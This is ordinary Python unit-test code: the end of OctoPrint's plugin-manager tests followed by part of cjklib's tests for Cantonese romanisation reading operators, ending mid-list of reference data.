self.assertEqual(name, impl._identifier)
self.assertTrue(hasattr(impl, "_plugin_name"))
self.assertEqual(plugin.name, impl._plugin_name)
self.assertTrue(hasattr(impl, "_plugin_version"))
self.assertEqual(plugin.version, impl._plugin_version)
self.assertTrue(hasattr(impl, "_logger"))
self.assertIsNotNone(impl._logger)
self.assertEqual("logging_prefix.%s" % name, impl._logger.name)
self.assertTrue(hasattr(impl, "_basefolder"))
self.assertTrue(impl._basefolder.startswith(self.plugin_folder))
# test that the additional injects were properly injected
self.assertTrue(hasattr(impl, "_additional_inject"))
self.assertEqual("additional_inject", impl._additional_inject)
# test that the injection factory was properly executed and the result injected
self.assertTrue(hasattr(impl, "_test_factory"))
self.assertEqual("test_factory_%s" % name, impl._test_factory)
def test_get_plugin(self):
plugin = self.plugin_manager.get_plugin("hook_plugin")
self.assertIsNotNone(plugin)
self.assertEqual("Hook Plugin", plugin.__plugin_name__)
plugin = self.plugin_manager.get_plugin("mixed_plugin")
self.assertIsNotNone(plugin)
self.assertEqual("Mixed Plugin", plugin.__plugin_name__)
plugin = self.plugin_manager.get_plugin("unknown_plugin")
self.assertIsNone(plugin)
def test_get_plugin_info(self):
plugin_info = self.plugin_manager.get_plugin_info("hook_plugin")
self.assertIsNotNone(plugin_info)
self.assertEqual("Hook Plugin", plugin_info.name)
plugin_info = self.plugin_manager.get_plugin_info("unknown_plugin")
self.assertIsNone(plugin_info)
def test_get_hooks(self):
hooks = self.plugin_manager.get_hooks("octoprint.core.startup")
self.assertEqual(1, len(hooks))
self.assertTrue("hook_plugin" in hooks)
self.assertEqual("success", hooks["hook_plugin"]())
hooks = self.plugin_manager.get_hooks("octoprint.printing.print")
self.assertEqual(0, len(hooks))
def test_sorted_hooks(self):
hooks = self.plugin_manager.get_hooks("some.ordered.callback")
self.assertEqual(3, len(hooks))
self.assertListEqual(["one_ordered_hook_plugin", "another_ordered_hook_plugin", "hook_plugin"], hooks.keys())
def test_get_implementations(self):
implementations = self.plugin_manager.get_implementations(octoprint.plugin.StartupPlugin)
self.assertListEqual(["mixed_plugin", "startup_plugin"], map(lambda x: x._identifier, implementations))
implementations = self.plugin_manager.get_implementations(octoprint.plugin.SettingsPlugin)
self.assertListEqual(["mixed_plugin", "settings_plugin"], map(lambda x: x._identifier, implementations))
implementations = self.plugin_manager.get_implementations(octoprint.plugin.StartupPlugin, octoprint.plugin.SettingsPlugin)
self.assertListEqual(["mixed_plugin"], map(lambda x: x._identifier, implementations))
implementations = self.plugin_manager.get_implementations(octoprint.plugin.AssetPlugin)
self.assertListEqual(["deprecated_plugin"], map(lambda x: x._identifier, implementations))
def test_get_filtered_implementations(self):
implementations = self.plugin_manager.get_filtered_implementations(lambda x: x._identifier.startswith("startup"), octoprint.plugin.StartupPlugin)
self.assertEqual(1, len(implementations))
def test_get_sorted_implementations(self):
implementations = self.plugin_manager.get_implementations(octoprint.plugin.StartupPlugin, sorting_context="sorting_test")
self.assertListEqual(["startup_plugin", "mixed_plugin"], map(lambda x: x._identifier, implementations))
def test_client_registration(self):
def test_client(*args, **kwargs):
pass
self.assertEqual(0, len(self.plugin_manager.registered_clients))
self.plugin_manager.register_message_receiver(test_client)
self.assertEqual(1, len(self.plugin_manager.registered_clients))
self.assertIn(test_client, self.plugin_manager.registered_clients)
self.plugin_manager.unregister_message_receiver(test_client)
self.assertEqual(0, len(self.plugin_manager.registered_clients))
self.assertNotIn(test_client, self.plugin_manager.registered_clients)
def test_send_plugin_message(self):
client1 = mock.Mock()
client2 = mock.Mock()
self.plugin_manager.register_message_receiver(client1.on_plugin_message)
self.plugin_manager.register_message_receiver(client2.on_plugin_message)
plugin = "some plugin"
data = "some data"
self.plugin_manager.send_plugin_message(plugin, data)
client1.on_plugin_message.assert_called_once_with(plugin, data)
client2.on_plugin_message.assert_called_once_with(plugin, data)
def test_validate_plugin(self):
self.assertTrue("deprecated_plugin" in self.plugin_manager.enabled_plugins)
plugin = self.plugin_manager.enabled_plugins["deprecated_plugin"]
self.assertTrue(hasattr(plugin.instance, plugin.__class__.attr_implementation))
self.assertFalse(hasattr(plugin.instance, plugin.__class__.attr_implementations))
@ddt.data(
(["octoprint.some_hook"], ["octoprint.some_hook", "octoprint.another_hook"], True),
(["octoprint.*"], ["octoprint.some_hook", "octoprint.another_hook"], True),
(["octoprint.some_hook"], ["octoprint.another_hook"], False),
(["octoprint.some_hook"], [], False),
([], ["octoprint.some_hook"], False)
)
@ddt.unpack
def test_has_any_of_hooks(self, hooks_to_test_for, plugin_hooks, expected):
plugin = mock.MagicMock()
plugin.hooks = dict((hook, hook) for hook in plugin_hooks)
actual = octoprint.plugin.core.PluginManager.has_any_of_hooks(plugin, hooks_to_test_for)
self.assertEqual(actual, expected)
def test_has_any_of_hooks_varargs(self):
plugin = mock.MagicMock()
plugin.hooks = dict((hook, hook) for hook in ["octoprint.some_hook", "octoprint.another_hook"])
result = octoprint.plugin.core.PluginManager.has_any_of_hooks(plugin, "octoprint.some_hook", "octoprint.some_other_hook")
self.assertTrue(result)
def test_has_any_of_hooks_nohooks(self):
plugin = mock.MagicMock()
result = octoprint.plugin.core.PluginManager.has_any_of_hooks(plugin, "octoprint.some_hook", "octoprint.some_other_hook")
self.assertFalse(result)
@ddt.data(
("octoprint.some_hook", ["octoprint.another_hook", "octoprint.some_hook"], True),
("octoprint.some_hook", ["octoprint.*"], True),
("octoprint.some_hook", ["octoprint.some_hook*"], True),
("octoprint.some_hook", ["octoprint.*_hook"], True),
("octoprint.some_hook", ["octoprint.another_hook.*"], False),
("", ["octoprint.some_hook"], False),
(None, ["octoprint.some_hook"], False),
("octoprint.some_hook", [], False),
("octoprint.some_hook", None, False),
("octoprint.some_hook", [None], False)
)
@ddt.unpack
def test_hook_matches_hooks(self, hook, hooks, expected):
actual = octoprint.plugin.core.PluginManager.hook_matches_hooks(hook, hooks)
self.assertEqual(actual, expected)
def test_hook_matches_hooks_varargs(self):
result = octoprint.plugin.core.PluginManager.hook_matches_hooks("octoprint.some_hook",
"octoprint.another_hook", "octoprint.some_hook")
self.assertTrue(result)
@ddt.data(
([octoprint.plugin.RestartNeedingPlugin], [octoprint.plugin.Plugin, octoprint.plugin.RestartNeedingPlugin], True),
([octoprint.plugin.RestartNeedingPlugin], [octoprint.plugin.Plugin], False),
([], [octoprint.plugin.Plugin], False),
([octoprint.plugin.RestartNeedingPlugin], [], False)
)
@ddt.unpack
def test_has_any_of_mixins(self, mixins_to_test_for, plugin_mixins, expected):
plugin = mock.MagicMock()
plugin.implementation = mock.MagicMock()
for mixin in plugin_mixins:
plugin.implementation.mock_add_spec(mixin)
actual = octoprint.plugin.core.PluginManager.has_any_of_mixins(plugin, mixins_to_test_for)
self.assertEqual(actual, expected)
def test_has_any_of_mixins_varargs(self):
plugin = mock.MagicMock()
plugin.implementation = mock.MagicMock()
plugin.implementation.mock_add_spec(octoprint.plugin.Plugin)
plugin.implementation.mock_add_spec(octoprint.plugin.RestartNeedingPlugin)
result = octoprint.plugin.core.PluginManager.has_any_of_mixins(plugin, octoprint.plugin.RestartNeedingPlugin)
self.assertTrue(result)
def test_has_any_of_mixins_noimplementation(self):
plugin = mock.MagicMock()
result = octoprint.plugin.core.PluginManager.has_any_of_mixins(plugin, octoprint.plugin.RestartNeedingPlugin)
self.assertFalse(result)
@ddt.data(
((A1_1, A_2, B_1, C_1), (A, C), (A_1, A1_1, A_2, C_1)),
((A1_1, A_2, B_1, C_1), (B,), (B_1,)),
# not a subclass
((A1_1, A_2, B_1, C_1), (D,), ()),
# subclass only of base
((A,), (A,), ())
)
@ddt.unpack
def test_mixins_matching_bases(self, bases_to_set, bases_to_check, expected):
Foo = type("Foo", bases_to_set, dict())
actual = octoprint.plugin.core.PluginManager.mixins_matching_bases(Foo, *bases_to_check)
self.assertSetEqual(actual, set(expected))
| Jaesin/OctoPrint | tests/plugin/test_core.py | Python | agpl-3.0 | 12,641 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# This file is part of cjklib.
#
# cjklib is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# cjklib is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with cjklib. If not, see <http://www.gnu.org/licenses/>.
"""
Unit tests for :mod:`cjklib.reading.operator`.
"""
# pylint: disable-msg=E1101
# testcase attributes and methods are only available in concrete classes
import re
import types
import unittest
import unicodedata
from cjklib.reading import ReadingFactory
from cjklib import exception
from cjklib.test import NeedsDatabaseTest, attr
from cjklib.util import crossDict
class ReadingOperatorTest(NeedsDatabaseTest):
"""
Base class for testing of
:class:`~cjklib.reading.operator.ReadingOperator` classes.
"""
READING_NAME = None
"""Name of reading to test"""
def setUp(self):
NeedsDatabaseTest.setUp(self)
self.f = ReadingFactory(dbConnectInst=self.db)
for clss in self.f.getReadingOperatorClasses():
if clss.READING_NAME == self.READING_NAME:
self.readingOperatorClass = clss
break
else:
self.readingOperatorClass = None
def shortDescription(self):
methodName = getattr(self, self.id().split('.')[-1])
# get whole doc string and remove superfluous white spaces
noWhitespaceDoc = re.sub('\s+', ' ', methodName.__doc__.strip())
# remove markup for epytext format
clearName = re.sub('[CLI]\{([^\}]*)}', r'\1', noWhitespaceDoc)
# add name of reading
return clearName + ' (for %s)' % self.READING_NAME
def tearDown(self):
# get rid of the possibly > 1000 instances
self.f.clearCache()
class ReadingOperatorConsistencyTest(ReadingOperatorTest):
"""
Base class for consistency testing of
:class:`~cjklib.reading.operator.ReadingOperator` classes.
"""
DIALECTS = []
"""
Dialects tested additionally to the standard one.
Given as list of dictionaries holding the dialect's options.
"""
def testReadingNameUnique(self):
"""Test if only one ReadingOperator exists for each reading."""
seen = False
for clss in self.f.getReadingOperatorClasses():
if clss.READING_NAME == self.READING_NAME:
self.assert_(not seen,
"Reading %s has more than one operator" \
% clss.READING_NAME)
seen = True
def testInstantiation(self):
"""Test if given dialects can be instantiated."""
self.assert_(self.readingOperatorClass != None,
"No reading operator class found" \
+ ' (reading %s)' % self.READING_NAME)
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
# instantiate
self.readingOperatorClass(**dialect)
def testDefaultOptions(self):
"""
Test if option dict returned by ``getDefaultOptions()`` is well-formed
and includes all options found in the test case's options.
"""
defaultOptions = self.readingOperatorClass.getDefaultOptions()
self.assertEquals(type(defaultOptions), type({}),
"Default options %s is not of type dict" % repr(defaultOptions) \
+ ' (reading %s)' % self.READING_NAME)
# test if option names are well-formed
for option in defaultOptions:
self.assertEquals(type(option), type(''),
"Option %s is not of type str" % repr(option) \
+ ' (reading %s)' % self.READING_NAME)
# test all given dialects
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
for option in dialect:
self.assert_(option in defaultOptions,
"Test case option %s not found in default options" \
% repr(option) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
# test instantiation of default options
defaultInstance = self.readingOperatorClass(**defaultOptions)
# check if option value changes after instantiation
for option in defaultOptions:
self.assertEqual(getattr(defaultInstance, option),
defaultOptions[option],
"Default option value %s for %s changed on instantiation: %s" \
% (repr(defaultOptions[option]), repr(option),
repr(getattr(defaultInstance, option))) \
+ ' (reading %s)' % self.READING_NAME)
# check options against instance without explicit option dict
instance = self.readingOperatorClass()
for option in defaultOptions:
self.assertEqual(getattr(instance, option),
getattr(defaultInstance, option),
"Option value for %s unequal for default instances: %s and %s" \
% (repr(option), repr(getattr(instance, option)),
repr(getattr(defaultInstance, option))) \
+ ' (reading %s)' % self.READING_NAME)
def testGuessReadingDialect(self):
"""
Test if option dict returned by ``guessReadingDialect()`` is well-formed
and options are included in dict from ``getDefaultOptions()``.
"""
if not hasattr(self.readingOperatorClass, 'guessReadingDialect'):
return
defaultOptions = self.readingOperatorClass.getDefaultOptions()
readingDialect = self.readingOperatorClass.guessReadingDialect('')
self.assertEquals(type(defaultOptions), type({}),
"Guessed options %s is not of type dict" % repr(readingDialect) \
+ ' (reading %s)' % self.READING_NAME)
# test if option names are well-formed
for option in readingDialect:
self.assertEquals(type(option), type(''),
"Option %s is not of type str" % repr(option) \
+ ' (reading %s)' % self.READING_NAME)
# test inclusion in default set
for option in readingDialect:
self.assert_(option in defaultOptions,
"Option %s not found in default options" % repr(option) \
+ ' (reading %s)' % self.READING_NAME)
# test instantiation of default options
self.readingOperatorClass(**readingDialect)
@attr('quiteslow')
def testReadingCharacters(self):
"""
Test if set returned by ``getReadingCharacters()`` is well-formed and
includes all characters found in reading entities.
"""
if not hasattr(self.readingOperatorClass, "getReadingCharacters"):
return
# test all given dialects
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
readingOperator = self.f.createReadingOperator(self.READING_NAME,
**dialect)
readingCharacters = readingOperator.getReadingCharacters()
# make sure all are characters
for char in readingCharacters:
self.assert_(len(char) == 1,
"Not len()==1: %s" % repr(char) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
entities = readingOperator.getReadingEntities()
for entity in entities:
charList = set(entity)
# include NFD form
charList.update(unicodedata.normalize('NFD', unicode(entity)))
for char in charList:
self.assert_(char in readingCharacters,
"Char %s not included" % repr(char) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
def testValidReadingEntitiesAccepted(self):
"""
Test if all *reading entities* returned by ``getReadingEntities()`` are
accepted by ``isReadingEntity()``.
"""
if not hasattr(self.readingOperatorClass, "getReadingEntities"):
return
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
entities = self.f.getReadingEntities(self.READING_NAME,
**dialect)
for entity in entities:
self.assert_(
self.f.isReadingEntity(entity, self.READING_NAME,
**dialect),
"Entity %s not accepted" % repr(entity) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
def testValidFormattingEntitiesAccepted(self):
"""
Test if all *formatting entities* returned by
``getFormattingEntities()`` are accepted by ``isFormattingEntity()``.
"""
if not hasattr(self.readingOperatorClass, "getFormattingEntities"):
return
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
entities = self.f.getFormattingEntities(self.READING_NAME,
**dialect)
for entity in entities:
self.assert_(
self.f.isFormattingEntity(entity, self.READING_NAME,
**dialect),
"Entity %s not accepted" % repr(entity) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
def testValidPlainReadingEntitiesAccepted(self):
"""
Test if all plain reading entities returned by
``getPlainReadingEntities()`` are accepted by ``isPlainReadingEntity()``.
"""
if not hasattr(self.readingOperatorClass, "getPlainReadingEntities"):
return
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
plainEntities = self.f.getPlainReadingEntities(self.READING_NAME,
**dialect)
for plainEntity in plainEntities:
self.assert_(
self.f.isPlainReadingEntity(plainEntity, self.READING_NAME,
**dialect),
"Plain entity %s not accepted" % repr(plainEntity) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
@attr('quiteslow')
def testOnsetRhyme(self):
"""Test if all plain entities are accepted by ``getOnsetRhyme()``."""
if not hasattr(self.readingOperatorClass, "getPlainReadingEntities") \
or not hasattr(self.readingOperatorClass, "getOnsetRhyme"):
return
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
readingOperator = self.f.createReadingOperator(self.READING_NAME,
**dialect)
plainEntities = readingOperator.getPlainReadingEntities()
for plainEntity in plainEntities:
try:
readingOperator.getOnsetRhyme(plainEntity)
except exception.InvalidEntityError:
self.fail("Plain entity %s not accepted" \
% repr(plainEntity) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
except exception.UnsupportedError:
pass
@attr('quiteslow')
def testDecomposeIsIdentityForSingleEntity(self):
"""
Test if all reading entities returned by ``getReadingEntities()`` are
decomposed into the single entity again.
"""
if not hasattr(self.readingOperatorClass, "getReadingEntities"):
return
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
entities = self.f.getReadingEntities(self.READING_NAME, **dialect)
for entity in entities:
try:
entities = self.f.decompose(entity, self.READING_NAME,
**dialect)
self.assertEquals(entities, [entity],
"decomposition on single entity %s" % repr(entity) \
+ " is not identical: %s" % repr(entities) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
except exception.AmbiguousDecompositionError:
self.fail("ambiguous decomposition for %s" % repr(entity) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
except exception.DecompositionError:
self.fail("decomposition error for %s" % repr(entity) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
@attr('quiteslow')
def testGetTonalEntityOfSplitEntityToneIsIdentity(self):
"""
Test if the composition of ``getTonalEntity()`` and ``splitEntityTone()``
returns the original value for all entities returned by
``getReadingEntities()``.
"""
if not (hasattr(self.readingOperatorClass, "getTonalEntity")
and hasattr(self.readingOperatorClass, "splitEntityTone")
and hasattr(self.readingOperatorClass, "getReadingEntities")):
return
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
entities = self.f.getReadingEntities(self.READING_NAME, **dialect)
for entity in entities:
try:
plainEntity, tone = self.f.splitEntityTone(entity,
self.READING_NAME, **dialect)
self.assertEquals(
self.f.getTonalEntity(plainEntity, tone,
self.READING_NAME, **dialect),
entity,
"Entity %s not preserved in composition" % repr(entity)\
+ " of getTonalEntity() and splitEntityTone()" \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
except exception.UnsupportedError:
pass
except exception.InvalidEntityError:
self.fail("Entity %s raised InvalidEntityError" \
% repr(entity) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
if (not hasattr(self, 'testUpperCase')
or self.testUpperCase(dialect)):
for entity in entities:
entityUpper = entity.upper()
if entity == entityUpper:
continue
try:
plainEntity, tone = self.f.splitEntityTone(
entityUpper, self.READING_NAME, **dialect)
self.assertEquals(
self.f.getTonalEntity(plainEntity, tone,
self.READING_NAME, **dialect),
entity.upper(),
("Entity %s not preserved in composition"
% repr(entityUpper)) \
+ " of getTonalEntity() and splitEntityTone()" \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
except exception.UnsupportedError:
pass
except exception.InvalidEntityError:
self.fail("Entity %s raised InvalidEntityError" \
% repr(entityUpper) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
@attr('quiteslow')
def testSplitEntityToneReturnsValidInformation(self):
"""
Test if ``splitEntityTone()`` returns a valid plain entity and a valid
tone for all entities returned by ``getReadingEntities()``.
"""
if not hasattr(self.readingOperatorClass, "getPlainReadingEntities"):
return
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
entities = self.f.getReadingEntities(self.READING_NAME, **dialect)
for entity in entities:
try:
plainEntity, tone = self.f.splitEntityTone(entity,
self.READING_NAME, **dialect)
self.assert_(self.f.isPlainReadingEntity(plainEntity,
self.READING_NAME, **dialect),
"Plain entity of %s not accepted: %s" \
% (repr(entity), repr(plainEntity)) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
self.assert_(
tone in self.f.getTones(self.READING_NAME, **dialect),
"Tone of entity %s not valid: %s " \
% (repr(entity), repr(tone)) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
except exception.UnsupportedError:
pass
except exception.InvalidEntityError:
self.fail("Entity %s raised InvalidEntityError" \
% repr(entity) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
#TODO Jyutping (missing tone marks) and CantoneseYale don't create strict
#compositions
@attr('slow')
def testDecomposeKeepsSyllablePairs(self):
"""
Test if all pairs of reading entities returned by
``getReadingEntities()`` are decomposed into the same pairs again and
possibly are strict.
"""
if not hasattr(self.readingOperatorClass, "getReadingEntities"):
return
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
entities = self.f.getReadingEntities(self.READING_NAME, **dialect)
for entityA in entities:
for entityB in entities:
pair = [entityA, entityB]
string = self.f.compose(pair, self.READING_NAME, **dialect)
try:
decomposition = self.f.decompose(string,
self.READING_NAME, **dialect)
if hasattr(self, 'cleanDecomposition'):
cleanDecomposition = self.cleanDecomposition(
decomposition, self.READING_NAME, **dialect)
else:
cleanDecomposition = decomposition
self.assertEquals(cleanDecomposition, pair,
"decompose doesn't keep entity pair %s: %s" \
% (repr(pair), repr(cleanDecomposition)) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
# test if method exists and by default is not False
if hasattr(self.readingOperatorClass,
"isStrictDecomposition") \
and self.f.isStrictDecomposition([],
self.READING_NAME, **dialect) != False: # TODO this doesn't capture bugs in isStrictDecomposition that return False for an empty array
strict = self.f.isStrictDecomposition(decomposition,
self.READING_NAME, **dialect)
self.assert_(strict,
"Decomposition for pair %s is not strict" \
% repr(string) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
except exception.AmbiguousDecompositionError:
self.fail('Decomposition ambiguous for pair %s' \
% repr(pair) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
except exception.DecompositionError:
self.fail('Decomposition fails for pair %s' \
% repr(pair) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
class ReadingOperatorTestCaseCheck(NeedsDatabaseTest, unittest.TestCase):
"""
Checks if every
:class:`~cjklib.reading.operator.ReadingOperator` has its own
:class:`~cjklib.test.readingoperator.ReadingOperatorConsistencyTest`.
"""
def testEveryOperatorHasConsistencyTest(self):
"""
Check if every reading has a test case.
"""
testClasses = self.getReadingOperatorConsistencyTestClasses()
testClassReadingNames = [clss.READING_NAME for clss in testClasses]
self.f = ReadingFactory(dbConnectInst=self.db)
for clss in self.f.getReadingOperatorClasses():
self.assert_(clss.READING_NAME in testClassReadingNames,
"Reading %s has no ReadingOperatorConsistencyTest" \
% clss.READING_NAME)
@staticmethod
def getReadingOperatorConsistencyTestClasses():
"""
Gets all classes implementing
:class:`cjklib.test.readingoperator.ReadingOperatorConsistencyTest`.
:rtype: list
:return: list of all classes inheriting form
:class:`cjklib.test.readingoperator.ReadingOperatorConsistencyTest`
"""
# get all non-abstract classes that inherit from
# ReadingOperatorConsistencyTest
testModule = __import__("cjklib.test.readingoperator")
testClasses = [clss for clss \
in testModule.test.readingoperator.__dict__.values() \
if type(clss) in [types.TypeType, types.ClassType] \
and issubclass(clss, ReadingOperatorConsistencyTest) \
and clss.READING_NAME]
return testClasses
class ReadingOperatorReferenceTest(ReadingOperatorTest):
"""
Base class for testing of references against
:class:`~cjklib.reading.operator.ReadingOperator` classes.
These tests assure that the given values are returned correctly.
"""
DECOMPOSITION_REFERENCES = []
"""
References to test ``decompose()`` operation.
List of dialect/reference tuples, schema: ({dialect}, [(reference, target)])
"""
COMPOSITION_REFERENCES = []
"""
References to test ``compose()`` operation.
List of dialect/reference tuples, schema: ({}, [(reference, target)])
"""
READING_ENTITY_REFERENCES = []
"""
References to test ``isReadingEntity()`` operation.
List of dialect/reference tuples, schema: ({}, [(reference, target)])
"""
GUESS_DIALECT_REFERENCES = []
"""
References to test ``guessReadingDialect()`` operation.
List of reference/dialect tuples, schema: (reference, {})
"""
def testDecompositionReferences(self):
"""Test if the given decomposition references are reached."""
for dialect, references in self.DECOMPOSITION_REFERENCES:
for reference, target in references:
args = [reference, self.READING_NAME]
if type(target) in [types.TypeType, types.ClassType] \
and issubclass(target, Exception):
self.assertRaises(target, self.f.decompose, *args,
**dialect)
else:
try:
decomposition = self.f.decompose(*args, **dialect)
self.assertEquals(decomposition, target,
"Decomposition %s of %s not reached: %s" \
% (repr(target), repr(reference),
repr(decomposition)) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
except exception.DecompositionError, e:
self.fail(
'DecompositionError for %s with target %s: %s' \
% (repr(reference), repr(target), repr(e)) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
def testCompositionReferences(self):
"""Test if the given composition references are reached."""
for dialect, references in self.COMPOSITION_REFERENCES:
for reference, target in references:
args = [reference, self.READING_NAME]
if type(target) in [types.TypeType, types.ClassType] \
and issubclass(target, Exception):
self.assertRaises(target, self.f.compose, *args, **dialect)
else:
try:
composition = self.f.compose(*args, **dialect)
self.assertEquals(composition, target,
"Composition %s of %s not reached: %s" \
% (repr(target), repr(reference),
repr(composition)) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
except exception.CompositionError, e:
self.fail('CompositionError for %s with target %s: %s' \
% (repr(reference), repr(target), repr(e)) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
def testEntityReferences(self):
"""Test if the given entity references are accepted/rejected."""
for dialect, references in self.READING_ENTITY_REFERENCES:
for reference, target in references:
result = self.f.isReadingEntity(reference,
self.READING_NAME, **dialect)
self.assertEquals(result, target,
"Target %s of %s not reached: %s" \
% (repr(target), repr(reference), repr(result)) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
def testGuessDialectReferences(self):
"""Test if ``guessReadingDialect()`` guesses the needed options."""
if not hasattr(self.readingOperatorClass, 'guessReadingDialect'):
return
for reference, dialect in self.GUESS_DIALECT_REFERENCES:
result = self.readingOperatorClass.guessReadingDialect(reference)
for option, value in dialect.items():
self.assert_(option in result,
"Guessed dialect doesn't include option %s" \
% repr(option) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
self.assertEquals(result[option], value,
"Target for option %s=%s not reached for %s: %s" \
% (repr(option), repr(value), repr(reference),
repr(result[option])) \
+ ' (reading %s)' % self.READING_NAME)
class CanoneseIPAOperatorConsistencyTest(ReadingOperatorConsistencyTest,
unittest.TestCase):
READING_NAME = 'CantoneseIPA'
DIALECTS = crossDict(
[{}, {'toneMarkType': 'numbers'}, {'toneMarkType': 'chaoDigits'},
{'toneMarkType': 'numbers', 'missingToneMark': 'ignore'},
{'toneMarkType': 'numbers', 'firstToneName': 'HighFalling'},
{'toneMarkType': 'numbers', 'missingToneMark': 'ignore',
'firstToneName': 'HighFalling'},
{'toneMarkType': 'chaoDigits', 'missingToneMark': 'ignore'},
#{'toneMarkType': 'diacritics'}, # TODO NotImplementedError
#{'toneMarkType': 'diacritics', 'missingToneMark': 'ignore'},
{'toneMarkType': 'none'}],
[{}, {'stopTones': 'general'}, {'stopTones': 'explicit'}],
)
@staticmethod
def testUpperCase(dialect):
return False
def cleanDecomposition(self, decomposition, reading, **options):
return [entity for entity in decomposition if entity != '.']
def testEntityCountConstant(self):
"""
Test if the number of reading entities reported by
``getReadingEntities()`` is constant between different stop tone
realisations.
"""
if not hasattr(self.readingOperatorClass, "getReadingEntities"):
return
entityCount = None
for stopTones in ['none', 'general', 'explicit']:
count = len(self.f.getReadingEntities(self.READING_NAME,
stopTones=stopTones))
if entityCount != None:
self.assertEquals(entityCount, count)
def testReportedToneValid(self):
"""
Test if the tone reported by ``splitEntityTone()`` is valid for the given
entity.
"""
if not hasattr(self.readingOperatorClass, "isToneValid"):
return
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
ipaOperator = self.f.createReadingOperator(self.READING_NAME,
**dialect)
entities = ipaOperator.getReadingEntities()
for entity in entities:
plainEntity, tone = ipaOperator.splitEntityTone(entity)
self.assert_(ipaOperator.isToneValid(plainEntity, tone),
"Tone %s is invalid with plain entity %s" \
% (repr(tone), repr(plainEntity)) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
def testBaseExplicitTones(self):
"""
Test if the tones reported by ``getBaseTone()`` and ``getExplicitTone()``
are valid.
"""
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
ipaOperator = self.f.createReadingOperator(self.READING_NAME,
**dialect)
for tone in ipaOperator.getTones():
tone = ipaOperator.getBaseTone(tone)
self.assert_(tone == None or tone in ipaOperator.TONES)
entities = ipaOperator.getPlainReadingEntities()
for plainEntity in entities:
for tone in ipaOperator.getTones():
try:
explicitTone = ipaOperator.getExplicitTone(plainEntity,
tone)
self.assert_(explicitTone == None \
or explicitTone in ipaOperator.TONES \
or explicitTone in ipaOperator.STOP_TONES_EXPLICIT)
except exception.InvalidEntityError:
pass
# TODO
#class CantoneseIPAOperatorReferenceTest(ReadingOperatorReferenceTest,
#unittest.TestCase):
#READING_NAME = 'CantoneseIPA'
#DECOMPOSITION_REFERENCES = []
#COMPOSITION_REFERENCES = []
#READING_ENTITY_REFERENCES = []
class CanoneseYaleOperatorConsistencyTest(ReadingOperatorConsistencyTest,
unittest.TestCase):
READING_NAME = 'CantoneseYale'
DIALECTS = crossDict(
[{}, {'strictDiacriticPlacement': True}, {'toneMarkType': 'numbers'},
{'toneMarkType': 'numbers', 'missingToneMark': 'ignore'},
{'toneMarkType': 'numbers', 'yaleFirstTone': '1stToneFalling'},
{'toneMarkType': 'numbers', 'missingToneMark': 'ignore',
'yaleFirstTone': '1stToneFalling'},
{'toneMarkType': 'none'}],
[{}, {'strictSegmentation': True}],
[{}, {'case': 'lower'}],
)
# TODO
class CantoneseYaleOperatorReferenceTest(ReadingOperatorReferenceTest,
unittest.TestCase):
READING_NAME = 'CantoneseYale'
DECOMPOSITION_REFERENCES = [
({}, [
(u'gwóngjàuwá', [u'gwóng', u'jàu', u'wá']),
(u'yuhtyúh', [u'yuht', u'yúh']),
(u'néihhóu', [u'néih', u'hóu']),
